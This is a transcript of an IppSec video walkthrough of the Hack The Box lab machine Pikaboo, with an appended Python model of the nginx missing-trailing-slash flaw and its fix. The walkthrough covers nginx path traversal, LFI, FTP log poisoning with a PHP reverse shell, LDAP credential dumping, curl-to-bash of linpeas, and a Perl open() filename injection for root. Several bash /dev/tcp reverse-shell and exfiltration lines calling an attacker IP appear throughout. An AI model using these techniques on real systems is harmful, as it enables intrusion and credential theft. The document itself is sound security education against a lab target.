HackTheBox - Pikaboo

Captions
What's going on YouTube, this is IppSec and we're doing Pikaboo from Hack The Box. I really like this box because of all the enumeration that you have to do in order to get a low privileged shell on the box. First you run nmap and discover the web server is nginx based upon the headers, however whenever you create an error message on the website it's an Apache error message, not nginx, so you know nginx is running in some type of reverse proxy configuration. Looking at gobuster output you see /admin-anything returns the same exact thing, so it looks like the location header in nginx is misconfigured. You try /admin.. and discover there is path traversal there, which allows you to access /server-status, which is an Apache thing that will leak some open files, most notably the /admin_staging directory. You do the path traversal to go in there and discover there's an LFI vulnerability, however PHP is configured in order to not let you outside of the /var directory, but you can access the FTP log through that and chain it together to get code execution. There's a lot more that comes after that that I like about this box, but let's just jump in.

As always we're going to start off with the nmap, so -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and call it pikaboo, and then the IP address of 10.10.10.249. This can take some time to run so I've already ran it. Looking at the results we have just three ports open, the first one being FTP on port 21, and it is running vsftpd version 3.something, and just from doing enough CTFs I know off the top of my head that there's no real exploit against recent versions of vsftpd. We can do searchsploit and see everything is 2.something. We could also test for anonymous login but nmap does that by default, so nothing really else to test for FTP. The next port is SSH on port 22 and it is telling us it's a Debian server. Then we have HTTP on port 80 and it's telling us it is nginx 1.14.2. The title of the page is saying Pikaboo, there's nothing really else there like cookies or anything, so let's just go take a look at the webpage.

So 10.10.10.249 and we get a page. The first thing I'm thinking about right now, because I see nginx and this little cat in the top left, is some type of Tomcat server. Looking at the page source to see if there's anything that indicates the framework that was used to build it, I don't really see anything, so it just looks like some weird one page application or a static page. We have Pikaboo, there's some pages here, the Pokédex. I thought I could hold control when I clicked that, it didn't work, actually it doesn't have an open in new tab, that's weird. But just scrolling down looking at what is on this page I don't see anything too interesting. We can look at the contact form or we can just go to these pages at the top left, and we have a /admin that requires authentication. And there's something really weird here, it's telling us it's an Apache server on this error message, 2.4.38 (Debian), and it's localhost:81. So there is probably some type of reverse proxy in play, with nginx sitting in front of Apache. Not exactly sure what its purpose is yet, but that's all we know.

We do see this URL is going to a .php, we have pokeapi.php?id=1, it just says more information coming soon. It left off at 12, I'm going to try like 13, still more information coming soon. Let's put text in to see if we get an error message, this is always saying coming soon, so I'm not exactly sure what this feature is yet. Let's just do this contact form, root@ippsec.rocks, message "please subscribe to IppSec", and then let's send this over to Burp Suite. Intercept is on and we're not getting anything. I'm going to open up my console tab, see if there's any weird JavaScript errors. This is contact.php, so just refresh the page for something, but I want to open this, and just went back to the page. Let's look at the network tab when we send this, nothing. We can look at inspector, look at this code, and it is literally just a button not really doing anything, so yeah, that's weird.

Let's just run a gobuster so we always have some type of recon going in the background, and I should have done this right at the start because we just lost a few minutes of time where we could have been running this. So gobuster dir -u http://10.10.10.249, -x php for extensions because we did see the PHP extension, -w wordlist /opt/SecLists/Discovery/Web-Content/raft-small-words.txt, and we probably should set an out file, so -o gobuster.out. One of the cool things this out file allows us to do (we can turn the intercept off) is view results live like this and also grep for them. So if we wanted to hide anything that starts with a /. because it looks like everything that starts with a period goes to a 403, we can easily do that with grep -v and then a caret and then we'll do slash and then escape the period because that's also a special character, and now we have gobuster hiding all of that output and we can run it a few times to see when new pages come.

We have admin.php, it gets us access denied, so if I try to access admin.php we get forbidden. Let's see, we have /admin, /administrator, /administrator.php, /admincp, and it looks like everything with admin is getting matched to something and going to a 401 which is asking for authentication. We can validate that by doing a bunch of stuff after admin and we still have authentication required, and I'm thinking of an old attack in nginx now. If you do like nginx, how it does the forwarding, you do location / what it begins with, and if you do this it's going to match anything that begins with /admin, and that's probably why we're seeing all of this. If you want to protect a directory you should always put a trailing slash here, otherwise you may be open to this vulnerability which allows us to do an LFI to the, I think Apache server, or maybe the nginx server, I think it's Apache, but because it's matching this, if I do like this I'm now in /var/www/html, and we can try accessing things like /server-status, which is a common page, so we can try that. So /admin../server-status and we have the Apache server stats. This allows us to see various pages, you can see like when a page is hanging or something or taking high memory, but for us it is leaking some locations, so we have this /admin_staging directory. So if I just go to 10.10.10.249/admin_staging it's asking for authentication, but if I put the /admin../ we can now access this directory. So this is looking interesting, I'm going to do index.php to see if this is indeed a PHP server, it is, so let's run a second gobuster. Whoops, wrong pane. Let's do gobuster dir -u http (I already had http in the clipboard so we don't have to do that twice), -x php again, -w wordlist /opt/SecLists/Discovery/Web-Content/raft-small-words.txt, and -o, we'll call this admin_staging.out, also tell us it is gobuster, so now we're running it on this directory.

Just clicking around, let's see, edit task, can we do that, remove, looks like this is a pretty dead application. We have user.php, we have a potential username so we could try to do some brute forcing with FTP or SSH right there. Table list, it's got this page thing, we can try testing for LFI. One of the ways I like doing LFI is just testing a php filter real quick, so php://filter/convert.base64-encode/resource= the file name, and we get a bunch of PHP, so we do have some type of LFI here. So echo -n, paste this, | base64 -d, invalid input. Let's see, we can go view source and copy it this way, I may have copied like that /div or something. echo -n | base64 -d, and what I'm looking for here is like a database file, normally there's like require config.php or db.php somewhere, or maybe an include statement. Looking at this I don't really see anything, what I'm going to do is just search for PHP tags first. Did that break my tmux? My tmux is not responding, file open tab tmux, I have no idea what just happened there, so I'm going to pause the video and fix up tmux.

Okay I'm back, I had to do a pkill -9 on tmux which involved restarting the VPN, so I decided I just want to do that off of recording. So let's copy this base64 command again, and this time I'm going to save it to a file and use grep, because apparently tmux did not like whatever search I did, that was a weird issue that I'm surprised I haven't encountered before. Let's see, base64 -d to index.php, and let's mkdir source and copy that file into the source. Let's see, I'm going to search for like require, file_get_contents, not there, include, we have include a few times and we can see it's including GET page, else dashboard.php. So let's see, this admin_staging, this is dashboard.php, and since it's doing an include on page we probably have some type of LFI. Let's try getting like /etc/passwd. So /etc/passwd, we don't need to view source, it's easier to see if it worked because the page will appear here. Let's see, that's /var/www/html, so maybe we're one directory too high, no. Let's do this, so this is weird, there's no filters on that, like we saw it's literally if isset include, but we can't get /etc/passwd. What I'm going to do is just try /var, let's see, it's /var/www/html, we're probably in admin_staging, index.php, does that exist, it does not, or maybe we are going through Burp Suite, no, oh we hung. Let's try /dashboard.php and we can pull the page, so we know LFI works, we just couldn't get to the /etc directory. I'm guessing there's some PHP hardening applied to this server, but normally when I have this type of LFI the good way to find out how to weaponize it is to do another gobuster.

So let's do, let's see, cd /opt/SecLists, find . | grep -i lfi, and we can use this graceful security Linux list. If I just less it we can look at it, and we got a lot of things, /var/log and just a lot of files in general, so this is a good wordlist to use once you have an LFI. And if we had gobustered this whole thing we'd probably find info.php. I was running gobuster here but remember my tmux crashed, which did crash gobuster and caused all sorts of issues, and I thought it was info.php, let's turn Burp Suite off, admin_staging, not exactly sure, but let's just use this wordlist. So I'm going to copy this and we can do wfuzz -u http://10.10.10.249/admin../admin_staging/ and then we want, what is it, where is it, I think page=, let's go back a few times, I can just copy this and we'll put FUZZ right there, -w for wordlist /opt/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt, and it should be running. Can I no longer ping the server? ping 10.10.10.249, so I think my VPN, I think I'm still having issues from when tmux crashed and VPN was probably just running in the background. Let's check info.php real quick, okay yeah that was it. So let's see, this tells you like the PHP hardening, and we can see open_basedir is set to /var, which means we won't be able to use PHP to get anything that is not in the /var directory, so that's why passwd failed.

But wfuzz should work now, and I'm going to hide characters 15349 and we're just going to see what payloads are here, which means we have faillog, vsftpd, wtmp, lastlog. vsftpd is good because we should be able to write directly to this log. We can look at its contents by just doing, where is it, let's go back, so /var/log/vsftpd.log. So we can see the contents, we have a username, where is it, that's QUIT, oh USER anonymous, so this may have been like my nmap testing anonymous login. But the key thing here is we can put anything into this because FTP is open to us, so we can put a PHP shell here, and because it is included (I forget exactly where that was, if we less index.php, let's see), because it is included it's going to execute anything in PHP tags. So I'm going to create a PHP one liner, so we want <?php system( then bash -c, bash -i, we can do, wait, yeah bash -c and then put the single quotes there, bash -i >& /dev/tcp/10.10.14.8/9001 0>&1 like that, and I think this will execute. So what I'm going to do is test this out first, so we can do nc -lvnp 9001 and php -a to get into interactive mode (I forget exactly what the a stands for), however we can just run a single PHP command and we get the reverse shell, which is good, so we know this command works. Always try testing things out before you throw them. So what I'm going to do is stand up my listener, then we ftp 10.10.10.249, log in with our PHP shell, password doesn't really matter because we just want to create that log entry, and now when I refresh this page we have a shell as www-data. I'm going to do python3 -c 'import pty; pty.spawn("/bin/bash")', Ctrl-Z to background, stty raw -echo; fg and enter twice, and now we have a reverse shell here where we can tab autocomplete.

So the first thing I want to look at is, we can go into admin, is there like a .htaccess? No, cat .htaccess, not there. find . | grep ht, I'm trying to find out what that password is when you try to go to like 10.10.10.249/admin, trying to find out exactly what this password is, because we're on a shell on the box we should be able to find that. I'm going to try checking admin.php, what is admin.php, find . | grep admin.php, I don't see it anywhere. I'm just going to go to /etc/nginx and let's check sites-enabled, cat default, and we can see the pages. So this admin, it does have what I suspected, there's no trailing slash here, artwork does have a trailing slash, it's going to /opt/pokeapi so it looks like maybe there's a Python application running here, and then 81 we have pokedex. I don't see exactly how it's saying that password though. /var/www/html, let's check admin, let's look at index.php, see if there's anything here, not exactly sure. Let's do export TERM=xterm. This is composer, let's see, find, let's just grep, grep -i password, we need to specify -r for recursive, -v '*.js', that did not work, we don't really want any of these assets, so what if I just put a star here, nope, nothing, so there's nothing password in these PHP files. Let's look at user.php, and this isn't straight PHP which is slightly annoying to look at, let's see, grep php user, there's no PHP tags in user at all, so I'm thinking this admin thing is a dead end even if we can't figure out exactly why it's asking us for authentication. Actually, oh, it's probably Apache, I was looking at, I think I was looking at nginx logs, right, I never looked at the Apache side of this, see virtual host 81, here we go, this is it. The reverse proxy confused me for a second because I was looking at nginx like no, it's forwarding it to Apache, and there's nothing here that says there's a password, but I forgot to check the Apache logs, so we can look at this and we do have a credential here. So let's see, vi creds.txt, let's move this to hashes, and just realized the Kraken server is powered off right now so I won't be able to crack this quickly, so let's just move on, because I don't want to do it on my host machine because it would slow down the video. I don't think we need to, but this was just enumeration I would have done on this box.

If we went back to the nginx, it did point us at /opt/pokeapi, and if we look at, let's see, find . -name '*.py', is it -name equals, I always screw up find syntax, find . | grep '*.py', wait what, find . | grep py, I don't know why that's breaking, grep anything that ends in py, okay, here's all the Python files. We do have this config directory and there is a settings, so let's try config/settings and look at this, it is Django which is a Python framework, it's using Redis there and we also have LDAP. So here is the actual, I forget exactly what it's called in LDAP, but the query where user is, so it's like a domain like pikaboo.htb, and it's using this password to log in. So let us grab this, so I'm going to grep, find user on settings.py and we'll do -A1 for after one to get both user and password. So I'm going to exit this and let's just change it up a little bit, vi notes.txt, let's copy these two lines and just paste them here. Okay so we can do ldapsearch and then what do we do here, is it -D, I think, for binding with a distinguished name, which is just a fancy way of saying this string, so we can do this and then we need -w for the password. I know the ldapsearch syntax is super weird like this, and it looks like we authenticate, if we do something wrong, let's see, we get invalid credentials, so we have successfully authenticated. We can do -s base namingContexts and this will probably give us pikaboo.htb, it gives us dc=htb, so we can say the base is dc=htb and we have started dumping the whole LDAP. If you want to know more about this just probably search ldapsearch on ippsec.rocks where I do it much more.

So we have this admin DN and userPassword is this base64. Let's echo -n | base64 -d and that looks like it is hashed, so we don't have that. Let us do, see, I thought I saw another one here, check out this userPassword, echo -n | base64 -d and we get a password for pwnmeow, and so is there anything else here, we have this, this is a bind user, so this is the password we had been using, yep, that is the password we already knew. So still right now pwnmeow is the interesting one, so let's try doing a su pwnmeow, logging in, and we get authentication failure. Let's try ssh pwnmeow@10.10.10.249 and let's see, we still can't log into the box. So testing the clipboard, we have the correct thing, so it's not that. There was a second thing, so we can do ftp 10.10.10.249 because this was also another login, pwnmeow, paste in the password, and we have authentication successful. Looking at this we have a lot of text so I'm going to do a search on ability_changelog_prose because this looks unique, so find / -name, paste that, 2>/dev/null, and this is in /srv/ftp, so there's probably something here with this FTP server, but really not sure.

Let's run linenum real quick, so cp /opt, we'll mkdir www and cp /opt, was it privilege-escalation-awesome-scripts-suite, and then linpeas, and linpeas.sh, copy it here, python3 -m http.server, and then we can curl 10.10.14.8 port 8000 linpeas.sh, pipe it over to bash and we'll see exactly what linpeas tells us. So I'm going to pause the video, it'll probably take 30 seconds to run. So right away linpeas is telling us the htpasswd, but it's not really too interesting to us. So let's search for linpeas.sh so we go to the very top of the script and work our way down. I'm just looking for things that are highlighted right now, this beginning stuff isn't really too interesting, it is detecting it is a VM, available software to us, here's processes, crons, timers and services, this is always interesting to look at, so we have a reverse shell there, there's nginx, nothing too interesting, credentials in memory, cron jobs, so cron.d, that's standard, cron.daily, that looks all normal, hourly, weekly, we have a file that is running every minute, this csvupdate_cron, so that is probably interesting. We should go through everything else just to do due diligence, looking at the timers, these are all standard. Looking through the rest of this output, the listening ports, we can see LDAP is there, 81 is that Apache, nothing too interesting here, logged in now, no one's logged in, we can see the last time pwnmeow had logged into the server, so we could also use like the find command and look for files edited around May 10th, and that may show us something to see exactly what pwnmeow was doing on the box at that time. PHP exec extensions, this is all just standard, we have PermitRootLogin allowed in SSH, nothing interesting there, still nothing really interesting, interesting files, these all look like standard, these are setuid binaries and setgid binaries, incrontab, this is an unknown one, this is like a cron but can execute upon a file being modified, which is really cool, so it's essentially crontab, we can look at incron at the end of this video if you want, and nothing really there.

So the key thing, I don't know what key I just hit but it popped up a terminal, the key thing is this /usr/local/bin/csvupdate_cron file, so let's cat that, and we can see all this is doing is going into this directory, taking every file, executing against csvupdate with this basename command, which I'm guessing is a bash binary, yep, so it's doing basename and this probably just gets you the base name of something. So if I do basename /srv/ftp/versions it's probably just going to give me versions would be my guess, yep, so that's what that's doing. So let's go back to cat this, so it's doing basename and then matching everything in .csv and then doing a rm -rf on this /srv/ftp. So let's look at csvupdate, so vim csvupdate, we don't have vim, we have vi though, and this is a Perl script. What I'm going to do real quick though is let's copy this over to our machine because we have syntax highlighting, and syntax highlighting is definitely nice. So I'm going to do nc -lvnp 9001 and we can cat /usr/local/bin/csvupdate > /dev/tcp/10.10.14.8/9001, and we should also redirect this to a file, so csvupdate.pl, send it, and now if I vim csvupdate.pl that looks much better.

So it's going into this CSV directory, bunch of files, not files, just like variables, so if ARGV is less than one then die and print out the usage. Now we set our v to type, it's going into the CSV directory and type.csv, unable to open, and it's doing a for loop and I'm guessing this is going to be the file name because that's probably ARGV. So I think this is parsing everything in ARGV is my guess, and ARGV is passed to be file names, and this is Perl, which this vulnerability is really hard to spot. The only reason I really knew of it is because of an old talk that I've watched a hundred times just because it is entertaining. I know I've linked it somewhere in a video, I forget what one, if you search for Perl Jam and then click on Perl Jam, not the band, there are two talks by this guy, they are both amazing, so definitely go to "Exploiting the 20 year old vulnerability" and then Perl Jam 2. But essentially how it boils down to is Perl, when you loop through this, it doesn't accept strings unless that string is ARGV, which I think in this case it is, but also it just wraps around an open command, an open on a file stream, and for some reason in Perl if you open and it begins or ends with a pipe it executes it instead. Not sure exactly why, but that's what that talk is about, it is the second one, Perl Jam 2. So when this part confuses you, as it probably should because this is such a weird thing, go reference that talk. So all we have to do is upload a CSV file that begins with a pipe and execute something.

So I'm going to go into a new directory, so mkdir ftp, and then let us echo bash -c bash -i, actually we don't need this because we're going to put it in base64, so bash -i >& /dev/tcp/10.10.14.8/9001 0>&1. I'm going to put it in single quotes and not double quotes in case anything's a special character, I don't want it interpreted, and we can base64 -w0. One thing I generally like doing, it's not required in this case, but I try to get rid of any special character in base64 when I can, so that equals sign is at the end, so if I put a space here that goes away, but I also want to get rid of this plus, and I'm guessing the plus is either in one of these two spots, or actually three, so I'm going to put a space before the -i and that did get rid of it, however we now have padding on the end, there is two there. If I get rid of that space it's now a plus here, so again let's add three here, oh, we don't have to add three there because the plus is happening before the end of the string, so I'm guessing that's happening where this 0>&1 is, there we go, and then we have a padding of two with these equals, and here we go. That probably overcomplicated it, but you can play around with base64, if you do it enough eventually you kind of eyeball it and figure out what to do to make it pure alphanumeric. We can look at it, still looks like it should work. So now we have to touch a file name, so I'm going to touch, and then echo this | base64 -d and then pipe it over to bash, and it also has to end with csv, so I'm just going to do a semicolon .csv, and for this touch command to work we probably want to do two dashes to begin with so it doesn't interpret anything as like an argument. So now if I do ls here we have this super weird file name, and we can also test out the payload by just executing this piece, so if I paste that in, we do nc -lvnp 9001, echo this, boom, that does work.

So the next step is to get into this ftp directory, I'm going to do lcd ftp, and what lcd means is local change directory, so when I ran ftp I was in this directory, I wanted to move into the ftp directory because that's where I put this weird shell. So I went into the directory and then the easiest way to put this on the server is just using mput and we can use a wildcard. Now we don't want to start the shell up right now because the weird thing is it's actually going to execute this, what, mput echo like that, not connected, it's weird. Let's just go in the ftp directory, ftp 10.10.10.249, it's pwnmeow and the password began with underscore G, Gotta Catch 'Em All, and shoot, I lost the command, but we can just grab it, so /home/pwnmeow right here, echo -n Gotta Catch 'Em All, so we logged in successfully. We want to go into the versions directory because that's where the cron actually changed directory into, if I cat /etc/crontab, cat /usr/local/bin/csvupdate_cron, let's see, I want to say it went into versions somewhere, /usr/local/bin/csvupdate, or maybe versions where we can write, but let's try doing that mput command again, we can just mput echo*, let's see, there we go, I guess I should not have put it in quotes. So if I try putting this here we can see it does execute it oddly enough, but it uploads it. If I do a date command here we can see we have another nine seconds till a new minute, and it runs it every minute, so hopefully at 16:03 we get a shell, and it doesn't look like we did, oh there we go, there's the shell. So here we are, we are now root on Pikaboo. So there was something I wanted to talk about in this video, I forget exactly what it was, right at the start of the video I said we can look at it post root and then I forgot all about what I said, so I guess that's going to be the video. Hope you guys enjoyed it, take care, and I will see you all next week.
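Editor's note, added example (not IppSec's code and not the box's real configuration): a small Python model of the nginx prefix-location rewrite that makes the /admin../ trick in the walkthrough work, next to the corrected form with the trailing slash. The video only says the admin location lacks a trailing slash; the exact directive shape `location /admin { proxy_pass http://127.0.0.1:81/admin/; }`, the assumption that Apache on :81 strips `..` segments before applying its rules, and the assumption that Apache protects everything under /admin/ are mine. Under those assumptions the model reproduces both observations from the video: every /admin-prefixed path gets a 401, and /admin../server-status lands outside the protected directory.

```python
import posixpath
from typing import Optional

# ASSUMED nginx site (not copied from the box): a prefix location without a
# trailing slash that forwards to the Apache vhost on :81, and the corrected
# form with the trailing slash.  Only the URI part of proxy_pass matters here.
VULNERABLE = {"location": "/admin", "proxy_uri": "/admin/"}
FIXED = {"location": "/admin/", "proxy_uri": "/admin/"}

# ASSUMED Apache-side rule: authentication required for everything under
# /admin/ on the upstream.
PROTECTED_PREFIX = "/admin/"


def nginx_prefix_match(request_uri: str, location: str) -> bool:
    """Prefix locations match with a plain startswith.  nginx merges dot
    segments only when they form a '/../' path component; 'admin..' is one
    ordinary component, so '/admin../x' reaches matching untouched."""
    return request_uri.startswith(location)


def nginx_proxy_uri(request_uri: str, location: str, proxy_uri: str) -> Optional[str]:
    """URI nginx hands to the upstream, or None when the location does not
    match and the request falls through to other locations.  With a URI
    part on proxy_pass, nginx replaces exactly the text matched by the
    location with that URI part and appends the remainder verbatim."""
    if not nginx_prefix_match(request_uri, location):
        return None
    return proxy_uri + request_uri[len(location):]


def apache_resolve(upstream_uri: str) -> str:
    """Upstream dot-segment removal: '/admin/../server-status' resolves to
    '/server-status' before any <Directory> rule is consulted."""
    resolved = posixpath.normpath(upstream_uri)
    if upstream_uri.endswith("/") and not resolved.endswith("/"):
        resolved += "/"  # normpath drops the trailing slash; keep directory requests as such
    return resolved


def route(request_uri: str, cfg: dict) -> Optional[str]:
    """Path the upstream finally acts on, or None if nginx never proxies it."""
    upstream = nginx_proxy_uri(request_uri, cfg["location"], cfg["proxy_uri"])
    return None if upstream is None else apache_resolve(upstream)


def requires_auth(resolved_path: Optional[str]) -> bool:
    """Would the assumed Apache auth rule for /admin/ apply to this path?"""
    return resolved_path is not None and resolved_path.startswith(PROTECTED_PREFIX)


if __name__ == "__main__":
    probes = ("/admin", "/admin_staging", "/admin../server-status", "/admin../admin_staging/")
    for name, cfg in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        for uri in probes:
            path = route(uri, cfg)
            print(f"{name:10} {uri:26} -> upstream {str(path):22} auth={requires_auth(path)}")
```

With the vulnerable entry, `/admin_staging` is forwarded as `/admin/_staging` (inside the protected directory, hence the wall of 401s gobuster saw), while `/admin../server-status` becomes `/admin/../server-status` and resolves to `/server-status` with no auth. With the trailing slash neither traversal path matches the location at all.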
Info
Channel: IppSec
Views: 13,585
Id: 4tXFHoeOytE
Length: 42min 26sec (2546 seconds)
Published: Sat Dec 04 2021